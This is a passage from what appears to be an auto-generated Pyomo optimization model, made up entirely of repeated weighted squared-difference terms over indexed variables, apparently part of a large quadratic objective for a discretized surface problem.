*m.x974 - 8.11690209768664*m.x1001)**2 + (1.3*m.x1000 - 1.3*m.x1001)**2) + 3.74962423061392*((
8.11690209768664*m.x975 - 8.11690209768664*m.x1002)**2 + (1.3*m.x1001 - 1.3*m.x1002)**2) +
3.74962423061392*((8.11690209768664*m.x976 - 8.11690209768664*m.x1003)**2 + (1.3*m.x1002 - 1.3*
m.x1003)**2) + 3.74962423061392*((8.11690209768664*m.x977 - 8.11690209768664*m.x1004)**2 + (1.3*
m.x1003 - 1.3*m.x1004)**2) + 3.74962423061392*((8.11690209768664*m.x978 - 8.11690209768664*
m.x1005)**2 + (1.3*m.x1004 - 1.3*m.x1005)**2) + 3.74962423061392*((8.11690209768664*m.x979 -
8.11690209768664*m.x1006)**2 + (1.3*m.x1005 - 1.3*m.x1006)**2) + 3.74962423061392*((
8.11690209768664*m.x980 - 8.11690209768664*m.x1007)**2 + (1.3*m.x1006 - 1.3*m.x1007)**2) +
3.74962423061392*((8.11690209768664*m.x981 - 8.11690209768664*m.x1008)**2 + (1.3*m.x1007 - 1.3*
m.x1008)**2) + 3.74962423061392*((8.11690209768664*m.x982 - 8.11690209768664*m.x1009)**2 + (1.3*
m.x1008 - 1.3*m.x1009)**2) + 3.74962423061392*((8.11690209768664*m.x983 - 8.11690209768664*
m.x1010)**2 + (1.3*m.x1009 - 1.3*m.x1010)**2) + 3.74962423061392*((8.11690209768664*m.x984 -
8.11690209768664*m.x1011)**2 + (1.3*m.x1010 - 1.3*m.x1011)**2) + 3.74962423061392*((
8.11690209768664*m.x985 - 8.11690209768664*m.x1012)**2 + (1.3*m.x1011 - 1.3*m.x1012)**2) +
3.74962423061392*((8.11690209768664*m.x986 - 8.11690209768664*m.x1013)**2 + (1.3*m.x1012 - 1.3*
m.x1013)**2) + 3.74962423061392*((8.11690209768664*m.x987 - 8.11690209768664*m.x1014)**2 + (1.3*
m.x1013 - 1.3*m.x1014)**2) + 3.74962423061392*((8.11690209768664*m.x988 - 8.11690209768664*
m.x1015)**2 + (1.3*m.x1014 - 1.3*m.x1015)**2) + 3.74962423061392*((8.11690209768664*m.x989 -
8.11690209768664*m.x1016)**2 + (1.3*m.x1015 - 1.3*m.x1016)**2) + 3.74962423061392*((
8.11690209768664*m.x990 - 8.11690209768664*m.x1017)**2 + (1.3*m.x1016 - 1.3*m.x1017)**2) +
3.74962423061392*((8.11690209768664*m.x991 - 8.11690209768664*m.x1018)**2 + (1.3*m.x1017 - 1.3*
m.x1018)**2) + 3.74962423061392*((8.11690209768664*m.x992 - 8.11690209768664*m.x1019)**2 + (1.3*
m.x1018 - 1.3*m.x1019)**2) + 3.74962423061392*((8.11690209768664*m.x993 - 8.11690209768664*
m.x1020)**2 + (1.3*m.x1019 - 1.3*m.x1020)**2) + 3.74962423061392*((8.11690209768664*m.x994 -
8.11690209768664*m.x1021)**2 + (1.3*m.x1020 - 1.3*m.x1021)**2) + 3.74962423061392*((
8.11690209768664*m.x995 - 8.11690209768664*m.x1022)**2 + (1.3*m.x1021 - 1.3*m.x1022)**2) +
3.74962423061392*((8.11690209768664*m.x996 - 8.11690209768664*m.x1023)**2 + (1.3*m.x1022 - 1.3*
m.x1023)**2) + 3.74962423061392*((8.11690209768664*m.x997 - 8.11690209768664*m.x1024)**2 + (1.3*
m.x1023 - 1.3*m.x1024)**2) + 3.74962423061392*((8.11690209768664*m.x998 - 8.11690209768664*
m.x1025)**2 + (1.3*m.x1024 - 1.3*m.x1025)**2) + 3.74962423061392*((8.11690209768664*m.x999 -
8.11690209768664*m.x1026)**2 + (1.3*m.x1025 - 1.3*m.x1026)**2) + 3.89094933535164*((
8.11690209768664*m.x1001 - 8.11690209768664*m.x1028)**2 + (1.3*m.x1027 - 1.3*m.x1028)**2) +
3.89094933535164*((8.11690209768664*m.x1002 - 8.11690209768664*m.x1029)**2 + (1.3*m.x1028 - 1.3*
m.x1029)**2) + 3.89094933535164*((8.11690209768664*m.x1003 - 8.11690209768664*m.x1030)**2 + (1.3*
m.x1029 - 1.3*m.x1030)**2) + 3.89094933535164*((8.11690209768664*m.x1004 - 8.11690209768664*
m.x1031)**2 + (1.3*m.x1030 - 1.3*m.x1031)**2) + 3.89094933535164*((8.11690209768664*m.x1005 -
8.11690209768664*m.x1032)**2 + (1.3*m.x1031 - 1.3*m.x1032)**2) + 3.89094933535164*((
8.11690209768664*m.x1006 - 8.11690209768664*m.x1033)**2 + (1.3*m.x1032 - 1.3*m.x1033)**2) +
3.89094933535164*((8.11690209768664*m.x1007 - 8.11690209768664*m.x1034)**2 + (1.3*m.x1033 - 1.3*
m.x1034)**2) + 3.89094933535164*((8.11690209768664*m.x1008 - 8.11690209768664*m.x1035)**2 + (1.3*
m.x1034 - 1.3*m.x1035)**2) + 3.89094933535164*((8.11690209768664*m.x1009 - 8.11690209768664*
m.x1036)**2 + (1.3*m.x1035 - 1.3*m.x1036)**2) + 3.89094933535164*((8.11690209768664*m.x1010 -
8.11690209768664*m.x1037)**2 + (1.3*m.x1036 - 1.3*m.x1037)**2) + 3.89094933535164*((
8.11690209768664*m.x1011 - 8.11690209768664*m.x1038)**2 + (1.3*m.x1037 - 1.3*m.x1038)**2) +
3.89094933535164*((8.11690209768664*m.x1012 - 8.11690209768664*m.x1039)**2 + (1.3*m.x1038 - 1.3*
m.x1039)**2) + 3.89094933535164*((8.11690209768664*m.x1013 - 8.11690209768664*m.x1040)**2 + (1.3*
m.x1039 - 1.3*m.x1040)**2) + 3.89094933535164*((8.11690209768664*m.x1014 - 8.11690209768664*
m.x1041)**2 + (1.3*m.x1040 - 1.3*m.x1041)**2) + 3.89094933535164*((8.11690209768664*m.x1015 -
8.11690209768664*m.x1042)**2 + (1.3*m.x1041 - 1.3*m.x1042)**2) + 3.89094933535164*((
8.11690209768664*m.x1016 - 8.11690209768664*m.x1043)**2 + (1.3*m.x1042 - 1.3*m.x1043)**2) +
3.89094933535164*((8.11690209768664*m.x1017 - 8.11690209768664*m.x1044)**2 + (1.3*m.x1043 - 1.3*
m.x1044)**2) + 3.89094933535164*((8.11690209768664*m.x1018 - 8.11690209768664*m.x1045)**2 + (1.3*
m.x1044 - 1.3*m.x1045)**2) + 3.89094933535164*((8.11690209768664*m.x1019 - 8.11690209768664*
m.x1046)**2 + (1.3*m.x1045 - 1.3*m.x1046)**2) + 3.89094933535164*((8.11690209768664*m.x1020 -
8.11690209768664*m.x1047)**2 + (1.3*m.x1046 - 1.3*m.x1047)**2) + 3.89094933535164*((
8.11690209768664*m.x1021 - 8.11690209768664*m.x1048)**2 + (1.3*m.x1047 - 1.3*m.x1048)**2) +
3.89094933535164*((8.11690209768664*m.x1022 - 8.11690209768664*m.x1049)**2 + (1.3*m.x1048 - 1.3*
m.x1049)**2) + 3.89094933535164*((8.11690209768664*m.x1023 - 8.11690209768664*m.x1050)**2 + (1.3*
m.x1049 - 1.3*m.x1050)**2) + 3.89094933535164*((8.11690209768664*m.x1024 - 8.11690209768664*
m.x1051)**2 + (1.3*m.x1050 - 1.3*m.x1051)**2) + 3.89094933535164*((8.11690209768664*m.x1025 -
8.11690209768664*m.x1052)**2 + (1.3*m.x1051 - 1.3*m.x1052)**2) + 3.89094933535164*((
8.11690209768664*m.x1026 - 8.11690209768664*m.x1053)**2 + (1.3*m.x1052 - 1.3*m.x1053)**2) +
4.03745320032772*((8.11690209768664*m.x1028 - 8.11690209768664*m.x1055)**2 + (1.3*m.x1054 - 1.3*
m.x1055)**2) + 4.03745320032772*((8.11690209768664*m.x1029 - 8.11690209768664*m.x1056)**2 + (1.3*
m.x1055 - 1.3*m.x1056)**2) + 4.03745320032772*((8.11690209768664*m.x1030 - 8.11690209768664*
m.x1057)**2 + (1.3*m.x1056 - 1.3*m.x1057)**2) + 4.03745320032772*((8.11690209768664*m.x1031 -
8.11690209768664*m.x1058)**2 + (1.3*m.x1057 - 1.3*m.x1058)**2) + 4.03745320032772*((
8.11690209768664*m.x1032 - 8.11690209768664*m.x1059)**2 + (1.3*m.x1058 - 1.3*m.x1059)**2) +
4.03745320032772*((8.11690209768664*m.x1033 - 8.11690209768664*m.x1060)**2 + (1.3*m.x1059 - 1.3*
m.x1060)**2) + 4.03745320032772*((8.11690209768664*m.x1034 - 8.11690209768664*m.x1061)**2 + (1.3*
m.x1060 - 1.3*m.x1061)**2) + 4.03745320032772*((8.11690209768664*m.x1035 - 8.11690209768664*
m.x1062)**2 + (1.3*m.x1061 - 1.3*m.x1062)**2) + 4.03745320032772*((8.11690209768664*m.x1036 -
8.11690209768664*m.x1063)**2 + (1.3*m.x1062 - 1.3*m.x1063)**2) + 4.03745320032772*((
8.11690209768664*m.x1037 - 8.11690209768664*m.x1064)**2 + (1.3*m.x1063 - 1.3*m.x1064)**2) +
4.03745320032772*((8.11690209768664*m.x1038 - 8.11690209768664*m.x1065)**2 + (1.3*m.x1064 - 1.3*
m.x1065)**2) + 4.03745320032772*((8.11690209768664*m.x1039 - 8.11690209768664*m.x1066)**2 + (1.3*
m.x1065 - 1.3*m.x1066)**2) + 4.03745320032772*((8.11690209768664*m.x1040 - 8.11690209768664*
m.x1067)**2 + (1.3*m.x1066 - 1.3*m.x1067)**2) + 4.03745320032772*((8.11690209768664*m.x1041 -
8.11690209768664*m.x1068)**2 + (1.3*m.x1067 - 1.3*m.x1068)**2) + 4.03745320032772*((
8.11690209768664*m.x1042 - 8.11690209768664*m.x1069)**2 + (1.3*m.x1068 - 1.3*m.x1069)**2) +
4.03745320032772*((8.11690209768664*m.x1043 - 8.11690209768664*m.x1070)**2 + (1.3*m.x1069 - 1.3*
m.x1070)**2) + 4.03745320032772*((8.11690209768664*m.x1044 - 8.11690209768664*m.x1071)**2 + (1.3*
m.x1070 - 1.3*m.x1071)**2) + 4.03745320032772*((8.11690209768664*m.x1045 - 8.11690209768664*
m.x1072)**2 + (1.3*m.x1071 - 1.3*m.x1072)**2) + 4.03745320032772*((8.11690209768664*m.x1046 -
8.11690209768664*m.x1073)**2 + (1.3*m.x1072 - 1.3*m.x1073)**2) + 4.03745320032772*((
8.11690209768664*m.x1047 - 8.11690209768664*m.x1074)**2 + (1.3*m.x1073 - 1.3*m.x1074)**2) +
4.03745320032772*((8.11690209768664*m.x1048 - 8.11690209768664*m.x1075)**2 + (1.3*m.x1074 - 1.3*
m.x1075)**2) + 4.03745320032772*((8.11690209768664*m.x1049 - 8.11690209768664*m.x1076)**2 + (1.3*
m.x1075 - 1.3*m.x1076)**2) + 4.03745320032772*((8.11690209768664*m.x1050 - 8.11690209768664*
m.x1077)**2 + (1.3*m.x1076 - 1.3*m.x1077)**2) + 4.03745320032772*((8.11690209768664*m.x1051 -
8.11690209768664*m.x1078)**2 + (1.3*m.x1077 - 1.3*m.x1078)**2) + 4.03745320032772*((
8.11690209768664*m.x1052 - 8.11690209768664*m.x1079)**2 + (1.3*m.x1078 - 1.3*m.x1079)**2) +
4.03745320032772*((8.11690209768664*m.x1053 - 8.11690209768664*m.x1080)**2 + (1.3*m.x1079 - 1.3*
m.x1080)**2) + 4.18699886780757*((8.11690209768664*m.x1055 - 8.11690209768664*m.x1082)**2 + (1.3*
m.x1081 - 1.3*m.x1082)**2) + 4.18699886780757*((8.11690209768664*m.x1056 - 8.11690209768664*
m.x1083)**2 + (1.3*m.x1082 - 1.3*m.x1083)**2) + 4.18699886780757*((8.11690209768664*m.x1057 -
8.11690209768664*m.x1084)**2 + (1.3*m.x1083 - 1.3*m.x1084)**2) + 4.18699886780757*((
8.11690209768664*m.x1058 - 8.11690209768664*m.x1085)**2 + (1.3*m.x1084 - 1.3*m.x1085)**2) +
4.18699886780757*((8.11690209768664*m.x1059 - 8.11690209768664*m.x1086)**2 + (1.3*m.x1085 - 1.3*
m.x1086)**2) + 4.18699886780757*((8.11690209768664*m.x1060 - 8.11690209768664*m.x1087)**2 + (1.3*
m.x1086 - 1.3*m.x1087)**2) + 4.18699886780757*((8.11690209768664*m.x1061 - 8.11690209768664*
m.x1088)**2 + (1.3*m.x1087 - 1.3*m.x1088)**2) + 4.18699886780757*((8.11690209768664*m.x1062 -
8.11690209768664*m.x1089)**2 + (1.3*m.x1088 - 1.3*m.x1089)**2) + 4.18699886780757*((
8.11690209768664*m.x1063 - 8.11690209768664*m.x1090)**2 + (1.3*m.x1089 - 1.3*m.x1090)**2) +
4.18699886780757*((8.11690209768664*m.x1064 - 8.11690209768664*m.x1091)**2 + (1.3*m.x1090 - 1.3*
m.x1091)**2) + 4.18699886780757*((8.11690209768664*m.x1065 - 8.11690209768664*m.x1092)**2 + (1.3*
m.x1091 - 1.3*m.x1092)**2) + 4.18699886780757*((8.11690209768664*m.x1066 - 8.11690209768664*
m.x1093)**2 + (1.3*m.x1092 - 1.3*m.x1093)**2) + 4.18699886780757*((8.11690209768664*m.x1067 -
8.11690209768664*m.x1094)**2 + (1.3*m.x1093 - 1.3*m.x1094)**2) + 4.18699886780757*((
8.11690209768664*m.x1068 - 8.11690209768664*m.x1095)**2 + (1.3*m.x1094 - 1.3*m.x1095)**2) +
4.18699886780757*((8.11690209768664*m.x1069 - 8.11690209768664*m.x1096)**2 + (1.3*m.x1095 - 1.3*
m.x1096)**2) + 4.18699886780757*((8.11690209768664*m.x1070 - 8.11690209768664*m.x1097)**2 + (1.3*
m.x1096 - 1.3*m.x1097)**2) + 4.18699886780757*((8.11690209768664*m.x1071 - 8.11690209768664*
m.x1098)**2 + (1.3*m.x1097 - 1.3*m.x1098)**2) + 4.18699886780757*((8.11690209768664*m.x1072 -
8.11690209768664*m.x1099)**2 + (1.3*m.x1098 - 1.3*m.x1099)**2) + 4.18699886780757*((
8.11690209768664*m.x1073 - 8.11690209768664*m.x1100)**2 + (1.3*m.x1099 - 1.3*m.x1100)**2) +
4.18699886780757*((8.11690209768664*m.x1074 - 8.11690209768664*m.x1101)**2 + (1.3*m.x1100 - 1.3*
m.x1101)**2) + 4.18699886780757*((8.11690209768664*m.x1075 - 8.11690209768664*m.x1102)**2 + (1.3*
m.x1101 - 1.3*m.x1102)**2) + 4.18699886780757*((8.11690209768664*m.x1076 - 8.11690209768664*
m.x1103)**2 + (1.3*m.x1102 - 1.3*m.x1103)**2) + 4.18699886780757*((8.11690209768664*m.x1077 -
8.11690209768664*m.x1104)**2 + (1.3*m.x1103 - 1.3*m.x1104)**2) + 4.18699886780757*((
8.11690209768664*m.x1078 - 8.11690209768664*m.x1105)**2 + (1.3*m.x1104 - 1.3*m.x1105)**2) +
4.18699886780757*((8.11690209768664*m.x1079 - 8.11690209768664*m.x1106)**2 + (1.3*m.x1105 - 1.3*
m.x1106)**2) + 4.18699886780757*((8.11690209768664*m.x1080 - 8.11690209768664*m.x1107)**2 + (1.3*
m.x1106 - 1.3*m.x1107)**2) + 4.33723936015933*((8.11690209768664*m.x1082 - 8.11690209768664*
m.x1109)**2 + (1.3*m.x1108 - 1.3*m.x1109)**2) + 4.33723936015933*((8.11690209768664*m.x1083 -
8.11690209768664*m.x1110)**2 + (1.3*m.x1109 - 1.3*m.x1110)**2) + 4.33723936015933*((
8.11690209768664*m.x1084 - 8.11690209768664*m.x1111)**2 + (1.3*m.x1110 - 1.3*m.x1111)**2) +
4.33723936015933*((8.11690209768664*m.x1085 - 8.11690209768664*m.x1112)**2 + (1.3*m.x1111 - 1.3*
m.x1112)**2) + 4.33723936015933*((8.11690209768664*m.x1086 - 8.11690209768664*m.x1113)**2 + (1.3*
m.x1112 - 1.3*m.x1113)**2) + 4.33723936015933*((8.11690209768664*m.x1087 - 8.11690209768664*
m.x1114)**2 + (1.3*m.x1113 - 1.3*m.x1114)**2) + 4.33723936015933*((8.11690209768664*m.x1088 -
8.11690209768664*m.x1115)**2 + (1.3*m.x1114 - 1.3*m.x1115)**2) + 4.33723936015933*((
8.11690209768664*m.x1089 - 8.11690209768664*m.x1116)**2 + (1.3*m.x1115 - 1.3*m.x1116)**2) +
4.33723936015933*((8.11690209768664*m.x1090 - 8.11690209768664*m.x1117)**2 + (1.3*m.x1116 - 1.3*
m.x1117)**2) + 4.33723936015933*((8.11690209768664*m.x1091 - 8.11690209768664*m.x1118)**2 + (1.3*
m.x1117 - 1.3*m.x1118)**2) + 4.33723936015933*((8.11690209768664*m.x1092 - 8.11690209768664*
m.x1119)**2 + (1.3*m.x1118 - 1.3*m.x1119)**2) + 4.33723936015933*((8.11690209768664*m.x1093 -
8.11690209768664*m.x1120)**2 + (1.3*m.x1119 - 1.3*m.x1120)**2) + 4.33723936015933*((
8.11690209768664*m.x1094 - 8.11690209768664*m.x1121)**2 + (1.3*m.x1120 - 1.3*m.x1121)**2) +
4.33723936015933*((8.11690209768664*m.x1095 - 8.11690209768664*m.x1122)**2 + (1.3*m.x1121 - 1.3*
m.x1122)**2) + 4.33723936015933*((8.11690209768664*m.x1096 - 8.11690209768664*m.x1123)**2 + (1.3*
m.x1122 - 1.3*m.x1123)**2) + 4.33723936015933*((8.11690209768664*m.x1097 - 8.11690209768664*
m.x1124)**2 + (1.3*m.x1123 - 1.3*m.x1124)**2) + 4.33723936015933*((8.11690209768664*m.x1098 -
8.11690209768664*m.x1125)**2 + (1.3*m.x1124 - 1.3*m.x1125)**2) + 4.33723936015933*((
8.11690209768664*m.x1099 - 8.11690209768664*m.x1126)**2 + (1.3*m.x1125 - 1.3*m.x1126)**2) +
4.33723936015933*((8.11690209768664*m.x1100 - 8.11690209768664*m.x1127)**2 + (1.3*m.x1126 - 1.3*
m.x1127)**2) + 4.33723936015933*((8.11690209768664*m.x1101 - 8.11690209768664*m.x1128)**2 + (1.3*
m.x1127 - 1.3*m.x1128)**2) + 4.33723936015933*((8.11690209768664*m.x1102 - 8.11690209768664*
m.x1129)**2 + (1.3*m.x1128 - 1.3*m.x1129)**2) + 4.33723936015933*((8.11690209768664*m.x1103 -
8.11690209768664*m.x1130)**2 + (1.3*m.x1129 - 1.3*m.x1130)**2) + 4.33723936015933*((
8.11690209768664*m.x1104 - 8.11690209768664*m.x1131)**2 + (1.3*m.x1130 - 1.3*m.x1131)**2) +
4.33723936015933*((8.11690209768664*m.x1105 - 8.11690209768664*m.x1132)**2 + (1.3*m.x1131 - 1.3*
m.x1132)**2) + 4.33723936015933*((8.11690209768664*m.x1106 - 8.11690209768664*m.x1133)**2 + (1.3*
m.x1132 - 1.3*m.x1133)**2) + 4.33723936015933*((8.11690209768664*m.x1107 - 8.11690209768664*
m.x1134)**2 + (1.3*m.x1133 - 1.3*m.x1134)**2) + 4.48565498144176*((8.11690209768664*m.x1109 -
8.11690209768664*m.x1136)**2 + (1.3*m.x1135 - 1.3*m.x1136)**2) + 4.48565498144176*((
8.11690209768664*m.x1110 - 8.11690209768664*m.x1137)**2 + (1.3*m.x1136 - 1.3*m.x1137)**2) +
4.48565498144176*((8.11690209768664*m.x1111 - 8.11690209768664*m.x1138)**2 + (1.3*m.x1137 - 1.3*
m.x1138)**2) + 4.48565498144176*((8.11690209768664*m.x1112 - 8.11690209768664*m.x1139)**2 + (1.3*
m.x1138 - 1.3*m.x1139)**2) + 4.48565498144176*((8.11690209768664*m.x1113 - 8.11690209768664*
m.x1140)**2 + (1.3*m.x1139 - 1.3*m.x1140)**2) + 4.48565498144176*((8.11690209768664*m.x1114 -
8.11690209768664*m.x1141)**2 + (1.3*m.x1140 - 1.3*m.x1141)**2) + 4.48565498144176*((
8.11690209768664*m.x1115 - 8.11690209768664*m.x1142)**2 + (1.3*m.x1141 - 1.3*m.x1142)**2) +
4.48565498144176*((8.11690209768664*m.x1116 - 8.11690209768664*m.x1143)**2 + (1.3*m.x1142 - 1.3*
m.x1143)**2) + 4.48565498144176*((8.11690209768664*m.x1117 - 8.11690209768664*m.x1144)**2 + (1.3*
m.x1143 - 1.3*m.x1144)**2) + 4.48565498144176*((8.11690209768664*m.x1118 - 8.11690209768664*
m.x1145)**2 + (1.3*m.x1144 - 1.3*m.x1145)**2) + 4.48565498144176*((8.11690209768664*m.x1119 -
8.11690209768664*m.x1146)**2 + (1.3*m.x1145 - 1.3*m.x1146)**2) + 4.48565498144176*((
8.11690209768664*m.x1120 - 8.11690209768664*m.x1147)**2 + (1.3*m.x1146 - 1.3*m.x1147)**2) +
4.48565498144176*((8.11690209768664*m.x1121 - 8.11690209768664*m.x1148)**2 + (1.3*m.x1147 - 1.3*
m.x1148)**2) + 4.48565498144176*((8.11690209768664*m.x1122 - 8.11690209768664*m.x1149)**2 + (1.3*
m.x1148 - 1.3*m.x1149)**2) + 4.48565498144176*((8.11690209768664*m.x1123 - 8.11690209768664*
m.x1150)**2 + (1.3*m.x1149 - 1.3*m.x1150)**2) + 4.48565498144176*((8.11690209768664*m.x1124 -
8.11690209768664*m.x1151)**2 + (1.3*m.x1150 - 1.3*m.x1151)**2) + 4.48565498144176*((
8.11690209768664*m.x1125 - 8.11690209768664*m.x1152)**2 + (1.3*m.x1151 - 1.3*m.x1152)**2) +
4.48565498144176*((8.11690209768664*m.x1126 - 8.11690209768664*m.x1153)**2 + (1.3*m.x1152 - 1.3*
m.x1153)**2) + 4.48565498144176*((8.11690209768664*m.x1127 - 8.11690209768664*m.x1154)**2 + (1.3*
m.x1153 - 1.3*m.x1154)**2) + 4.48565498144176*((8.11690209768664*m.x1128 - 8.11690209768664*
m.x1155)**2 + (1.3*m.x1154 - 1.3*m.x1155)**2) + 4.48565498144176*((8.11690209768664*m.x1129 -
8.11690209768664*m.x1156)**2 + (1.3*m.x1155 - 1.3*m.x1156)**2) + 4.48565498144176*((
8.11690209768664*m.x1130 - 8.11690209768664*m.x1157)**2 + (1.3*m.x1156 - 1.3*m.x1157)**2) +
4.48565498144176*((8.11690209768664*m.x1131 - 8.11690209768664*m.x1158)**2 + (1.3*m.x1157 - 1.3*
m.x1158)**2) + 4.48565498144176*((8.11690209768664*m.x1132 - 8.11690209768664*m.x1159)**2 + (1.3*
m.x1158 - 1.3*m.x1159)**2) + 4.48565498144176*((8.11690209768664*m.x1133 - 8.11690209768664*
m.x1160)**2 + (1.3*m.x1159 - 1.3*m.x1160)**2) + 4.48565498144176*((8.11690209768664*m.x1134 -
8.11690209768664*m.x1161)**2 + (1.3*m.x1160 - 1.3*m.x1161)**2) + 4.6296035638455*((
8.11690209768664*m.x1136 - 8.11690209768664*m.x1163)**2 + (1.3*m.x1162 - 1.3*m.x1163)**2) +
4.6296035638455*((8.11690209768664*m.x1137 - 8.11690209768664*m.x1164)**2 + (1.3*m.x1163 - 1.3*
m.x1164)**2) + 4.6296035638455*((8.11690209768664*m.x1138 - 8.11690209768664*m.x1165)**2 + (1.3*
m.x1164 - 1.3*m.x1165)**2) + 4.6296035638455*((8.11690209768664*m.x1139 - 8.11690209768664*
m.x1166)**2 + (1.3*m.x1165 - 1.3*m.x1166)**2) + 4.6296035638455*((8.11690209768664*m.x1140 -
8.11690209768664*m.x1167)**2 + (1.3*m.x1166 - 1.3*m.x1167)**2) + 4.6296035638455*((
8.11690209768664*m.x1141 - 8.11690209768664*m.x1168)**2 + (1.3*m.x1167 - 1.3*m.x1168)**2) +
4.6296035638455*((8.11690209768664*m.x1142 - 8.11690209768664*m.x1169)**2 + (1.3*m.x1168 - 1.3*
m.x1169)**2) + 4.6296035638455*((8.11690209768664*m.x1143 - 8.11690209768664*m.x1170)**2 + (1.3*
m.x1169 - 1.3*m.x1170)**2) + 4.6296035638455*((8.11690209768664*m.x1144 - 8.11690209768664*
m.x1171)**2 + (1.3*m.x1170 - 1.3*m.x1171)**2) + 4.6296035638455*((8.11690209768664*m.x1145 -
8.11690209768664*m.x1172)**2 + (1.3*m.x1171 - 1.3*m.x1172)**2) + 4.6296035638455*((
8.11690209768664*m.x1146 - 8.11690209768664*m.x1173)**2 + (1.3*m.x1172 - 1.3*m.x1173)**2) +
4.6296035638455*((8.11690209768664*m.x1147 - 8.11690209768664*m.x1174)**2 + (1.3*m.x1173 - 1.3*
m.x1174)**2) + 4.6296035638455*((8.11690209768664*m.x1148 - 8.11690209768664*m.x1175)**2 + (1.3*
m.x1174 - 1.3*m.x1175)**2) + 4.6296035638455*((8.11690209768664*m.x1149 - 8.11690209768664*
m.x1176)**2 + (1.3*m.x1175 - 1.3*m.x1176)**2) + 4.6296035638455*((8.11690209768664*m.x1150 -
8.11690209768664*m.x1177)**2 + (1.3*m.x1176 - 1.3*m.x1177)**2) + 4.6296035638455*((
8.11690209768664*m.x1151 - 8.11690209768664*m.x1178)**2 + (1.3*m.x1177 - 1.3*m.x1178)**2) +
4.6296035638455*((8.11690209768664*m.x1152 - 8.11690209768664*m.x1179)**2 + (1.3*m.x1178 - 1.3*
m.x1179)**2) + 4.6296035638455*((8.11690209768664*m.x1153 - 8.11690209768664*m.x1180)**2 + (1.3*
m.x1179 - 1.3*m.x1180)**2) + 4.6296035638455*((8.11690209768664*m.x1154 - 8.11690209768664*
m.x1181)**2 + (1.3*m.x1180 - 1.3*m.x1181)**2) + 4.6296035638455*((8.11690209768664*m.x1155 -
8.11690209768664*m.x1182)**2 + (1.3*m.x1181 - 1.3*m.x1182)**2) + 4.6296035638455*((
8.11690209768664*m.x1156 - 8.11690209768664*m.x1183)**2 + (1.3*m.x1182 - 1.3*m.x1183)**2) +
4.6296035638455*((8.11690209768664*m.x1157 - 8.11690209768664*m.x1184)**2 + (1.3*m.x1183 - 1.3*
m.x1184)**2) + 4.6296035638455*((8.11690209768664*m.x1158 - 8.11690209768664*m.x1185)**2 + (1.3*
m.x1184 - 1.3*m.x1185)**2) + 4.6296035638455*((8.11690209768664*m.x1159 - 8.11690209768664*
m.x1186)**2 + (1.3*m.x1185 - 1.3*m.x1186)**2) + 4.6296035638455*((8.11690209768664*m.x1160 -
8.11690209768664*m.x1187)**2 + (1.3*m.x1186 - 1.3*m.x1187)**2) + 4.6296035638455*((
8.11690209768664*m.x1161 - 8.11690209768664*m.x1188)**2 + (1.3*m.x1187 - 1.3*m.x1188)**2) +
4.76638251784576*((8.11690209768664*m.x1163 - 8.11690209768664*m.x1190)**2 + (1.3*m.x1189 - 1.3*
m.x1190)**2) + 4.76638251784576*((8.11690209768664*m.x1164 - 8.11690209768664*m.x1191)**2 + (1.3*
m.x1190 - 1.3*m.x1191)**2) + 4.76638251784576*((8.11690209768664*m.x1165 - 8.11690209768664*
m.x1192)**2 + (1.3*m.x1191 - 1.3*m.x1192)**2) + 4.76638251784576*((8.11690209768664*m.x1166 -
8.11690209768664*m.x1193)**2 + (1.3*m.x1192 - 1.3*m.x1193)**2) + 4.76638251784576*((
8.11690209768664*m.x1167 - 8.11690209768664*m.x1194)**2 + (1.3*m.x1193 - 1.3*m.x1194)**2) +
4.76638251784576*((8.11690209768664*m.x1168 - 8.11690209768664*m.x1195)**2 + (1.3*m.x1194 - 1.3*
m.x1195)**2) + 4.76638251784576*((8.11690209768664*m.x1169 - 8.11690209768664*m.x1196)**2 + (1.3*
m.x1195 - 1.3*m.x1196)**2) + 4.76638251784576*((8.11690209768664*m.x1170 - 8.11690209768664*
m.x1197)**2 + (1.3*m.x1196 - 1.3*m.x1197)**2) + 4.76638251784576*((8.11690209768664*m.x1171 -
8.11690209768664*m.x1198)**2 + (1.3*m.x1197 - 1.3*m.x1198)**2) + 4.76638251784576*((
8.11690209768664*m.x1172 - 8.11690209768664*m.x1199)**2 + (1.3*m.x1198 - 1.3*m.x1199)**2) +
4.76638251784576*((8.11690209768664*m.x1173 - 8.11690209768664*m.x1200)**2 + (1.3*m.x1199 - 1.3*
m.x1200)**2) + 4.76638251784576*((8.11690209768664*m.x1174 - 8.11690209768664*m.x1201)**2 + (1.3*
m.x1200 - 1.3*m.x1201)**2) + 4.76638251784576*((8.11690209768664*m.x1175 - 8.11690209768664*
m.x1202)**2 + (1.3*m.x1201 - 1.3*m.x1202)**2) + 4.76638251784576*((8.11690209768664*m.x1176 -
8.11690209768664*m.x1203)**2 + (1.3*m.x1202 - 1.3*m.x1203)**2) + 4.76638251784576*((
8.11690209768664*m.x1177 - 8.11690209768664*m.x1204)**2 + (1.3*m.x1203 - 1.3*m.x1204)**2) +
4.76638251784576*((8.11690209768664*m.x1178 - 8.11690209768664*m.x1205)**2 + (1.3*m.x1204 - 1.3*
m.x1205)**2) + 4.76638251784576*((8.11690209768664*m.x1179 - 8.11690209768664*m.x1206)**2 + (1.3*
m.x1205 - 1.3*m.x1206)**2) + 4.76638251784576*((8.11690209768664*m.x1180 - 8.11690209768664*
m.x1207)**2 + (1.3*m.x1206 - 1.3*m.x1207)**2) + 4.76638251784576*((8.11690209768664*m.x1181 -
8.11690209768664*m.x1208)**2 + (1.3*m.x1207 - 1.3*m.x1208)**2) + 4.76638251784576*((
8.11690209768664*m.x1182 - 8.11690209768664*m.x1209)**2 + (1.3*m.x1208 - 1.3*m.x1209)**2) +
4.76638251784576*((8.11690209768664*m.x1183 - 8.11690209768664*m.x1210)**2 + (1.3*m.x1209 - 1.3*
m.x1210)**2) + 4.76638251784576*((8.11690209768664*m.x1184 - 8.11690209768664*m.x1211)**2 + (1.3*
m.x1210 - 1.3*m.x1211)**2) + 4.76638251784576*((8.11690209768664*m.x1185 - 8.11690209768664*
m.x1212)**2 + (1.3*m.x1211 - 1.3*m.x1212)**2) + 4.76638251784576*((8.11690209768664*m.x1186 -
8.11690209768664*m.x1213)**2 + (1.3*m.x1212 - 1.3*m.x1213)**2) + 4.76638251784576*((
8.11690209768664*m.x1187 - 8.11690209768664*m.x1214)**2 + (1.3*m.x1213 - 1.3*m.x1214)**2) +
4.76638251784576*((8.11690209768664*m.x1188 - 8.11690209768664*m.x1215)**2 + (1.3*m.x1214 - 1.3*
m.x1215)**2) + 4.89330064653257*((8.11690209768664*m.x1190 - 8.11690209768664*m.x1217)**2 + (1.3*
m.x1216 - 1.3*m.x1217)**2) + 4.89330064653257*((8.11690209768664*m.x1191 - 8.11690209768664*
